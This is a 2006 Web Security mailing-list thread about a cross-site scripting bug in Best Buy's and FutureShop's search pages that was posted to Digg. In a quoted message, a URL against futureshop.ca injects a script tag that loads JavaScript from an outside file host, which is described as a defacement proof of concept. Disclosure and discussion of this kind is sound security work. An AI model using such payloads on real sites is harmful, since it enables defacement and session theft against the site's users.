[WEB SECURITY] Best Buy XSS bug posted to Digg
Jeremiah Grossman
jeremiah at whitehatsec.com
Thu Jan 12 18:55:28 EST 2006
They may have already fixed it since it was first disclosed.
Regards,
Jeremiah-
On Jan 12, 2006, at 3:45 PM, Our World Is Here wrote:
> This did not work. Firefox 1.5
>
> I got a normal 404 custom Best buy error message on both
> bestbuy.com and
> bestbuy.ca
>
> Cheers,
>
> James Friesen, CIO
>
> Lucretia Enterprises
> "Our World Is Here..."
> Info at lucretia dot ca
> http://lucretia.ca
>
>
>> -----Original Message-----
>> From: Jeremiah Grossman [mailto:jeremiah at whitehatsec.com]
>> Sent: Thursday, January 12, 2006 10:37 AM
>> To: Our World Is Here
>> Subject: Re: [WEB SECURITY] Best Buy XSS bug posted to Digg
>>
>> After the page is loaded, you'll notice it changes to a black
>> background with "Don't panic" in red. Basically a simple XSS
>> defacement proof of concept demo. freeuploader is just used
>> to host the JS exploit code.
>>
>> http://www.freeuploader.com/view.php/96559.txt
>>
>>
>>
>>
>> On Jan 11, 2006, at 5:00 PM, Our World Is Here wrote:
>>
>>> What exactly is this supposted to do?
>>>
>>> I tested the links on those sites, and got searches cannot be found
>>> please try again.
>>>
>>> http://www.futureshop.ca/search/searchresult.asp?keyword=%3Cscript%
>>> 20languag
>>> e=%22javascript%22%20src=%22http://www.freeuploader.com/view.php/
>>> 96559.txt%2
>>> 2%3E%3C/script%3E
>>>
>>> I'm assuming you think it would reload freeuploader? The blog was
>>> seriously deprived of 'info'.
>>>
>>> Cheers,
>>>
>>> James Friesen
>>>
>>>> -----Original Message-----
>>>> From: Jeremiah Grossman [mailto:jeremiah at whitehatsec.com]
>>>> Sent: Wednesday, January 11, 2006 2:30 PM
>>>> To: websecurity at webappsec.org
>>>> Subject: [WEB SECURITY] Best Buy XSS bug posted to Digg
>>>>
>>>> http://digg.com/security/BestBuy_Code_Injection_Vulnerability
>>>>
>>>> Notice the posted link is shorted (disguised?) using Yatuc.
>>>>
>>>> In the comments, FutureShop is also mentioned as being vulnerable.
>>>>
>>>>
>>>> Regards,
>>>>
>>>> Jeremiah-
>>>>
>>>>
>> ---------------------------------------------------------------------
>>>> The Web Security Mailing List
>>>> http://www.webappsec.org/lists/websecurity/
>>>>
>>>> The Web Security Mailing List Archives
>>>> http://www.webappsec.org/lists/websecurity/archive/
>>>>
>>>>
>>>>
>>>
>>>
>>
>>
>>
>
>
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
More information about the websecurity
mailing list